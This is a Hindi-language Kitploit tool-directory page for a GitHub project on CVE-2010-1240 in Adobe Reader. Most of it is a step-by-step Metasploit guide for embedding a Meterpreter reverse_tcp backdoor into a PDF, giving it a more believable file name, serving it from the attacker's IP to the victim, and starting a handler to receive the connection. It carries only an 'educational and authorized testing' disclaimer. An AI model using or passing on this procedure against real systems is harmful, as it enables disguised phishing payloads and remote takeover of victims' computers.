Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2010-1240 — शैक्षिक प्रमाण-अवधारणा जो दर्शाती है कि CVE-2010-1240 का शोषण करके PDF फ़ाइल में Meterpreter बैकडोर कैसे एम्बेड किया जाए, साथ ही अधिकृत सुरक्षा परीक्षण के लिए चरण-दर-चरण Metasploit निर्देश। | Kitploit
उपकरण/GitHubGitHub/asepsaepdin/cve-2010-1240
फ़िशिंग उपकरणशोषण फ्रेमवर्कवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगसामाजिक इंजीनियरिंगपेलोड डेवलपमेंट
GitHubasepsaepdin/cve-2010-1240

CVE-2010-1240

शैक्षिक प्रमाण-अवधारणा जो दर्शाती है कि CVE-2010-1240 का शोषण करके PDF फ़ाइल में Meterpreter बैकडोर कैसे एम्बेड किया जाए, साथ ही अधिकृत सुरक्षा परीक्षण के लिए चरण-दर-चरण Metasploit निर्देश।

रिपॉजिटरी देखें
11533 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2010-1240 - PDF में बैकडोर एम्बेड करना

Python


⚠️ केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए

विवरण

Adobe Reader और Acrobat 9.x (9.3.3 से पहले), तथा Windows और Mac OS X पर 8.x (8.2.3 से पहले), Launch File चेतावनी संवाद में एक टेक्स्ट फ़ील्ड की सामग्री को प्रतिबंधित नहीं करते हैं, जिससे दूरस्थ हमलावरों के लिए उपयोगकर्ताओं को PDF दस्तावेज़ में निर्दिष्ट किसी भी स्थानीय प्रोग्राम को निष्पादित करने के लिए धोखा देना आसान हो जाता है, जैसा कि एक टेक्स्ट फ़ील्ड द्वारा प्रदर्शित किया गया है जो दावा करता है कि Open बटन उपयोगकर्ता को एक एन्क्रिप्टेड संदेश पढ़ने में सक्षम करेगा।

डेमो

Animation

चरण गाइड

  1. सबसे पहले, msfconsole चलाएँ

    root@kitploit:~
    msfconsole
    
  2. फिर, PDF एम्बेड करने के लिए payload सेट करें

    root@kitploit:~
    use exploit/windows/fileformat/adobe_pdf_embedded_exe
    
  3. INFILENAME विकल्प सेट करें और मूल PDF फ़ाइल का सीधा पथ प्रदान करें

    root@kitploit:~
    set INFILENAME /home/kali/Downloads/certificate-foundations-of-threat-hunting-60c893e734422a67991e093c.pdf
    
  4. FILENAME विकल्प सेट करके नई बनाई गई दुर्भावनापूर्ण PDF फ़ाइल का नाम कुछ अधिक विश्वसनीय रखें

    root@kitploit:~
    set FILENAME laporan.pdf
    
  5. payload ढूंढें और उसे PDF फ़ाइल में एम्बेड करें

    root@kitploit:~
    set payload windows/meterpreter/reverse_tcp
    
  6. LHOST विकल्प को हमलावर के IP पर सेट करें

    root@kitploit:~
    set LHOST 172.16.10.10
    
  7. एक नया टर्मिनल खोलें और दुर्भावनापूर्ण PDF फ़ाइल के स्थान पर नेविगेट करें

    root@kitploit:~
    cd .msf4/local/
    
  8. Python में एक अस्थायी सर्वर बनाएँ

    root@kitploit:~
    python -m http.server
    
  9. पीड़ित की मशीन पर दुर्भावनापूर्ण PDF फ़ाइल डाउनलोड करें

    root@kitploit:~
    http://172.16.10.10:8000/certificate.pdf
    
  10. पीड़ित की मशीन पर दुर्भावनापूर्ण PDF फ़ाइल चलाने से पहले, पिछले टर्मिनल पर listener प्रारंभ करें

    root@kitploit:~
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 172.16.10.10
    exploit
    
  11. एक बार जब दुर्भावनापूर्ण PDF फ़ाइल पीड़ित की मशीन पर निष्पादित हो जाती है, तो यह आपको पीड़ित की मशीन से कनेक्शन दे देगी

क्रेडिट

  • https://nvd.nist.gov/vuln/detail/CVE-2010-1240
  • https://medium.com/purple-team/embedding-backdoor-into-pdf-files-1781dfce62b1
  • https://github.com/Jasmoon99/Embedded-PDF
टूल डाउनलोड करें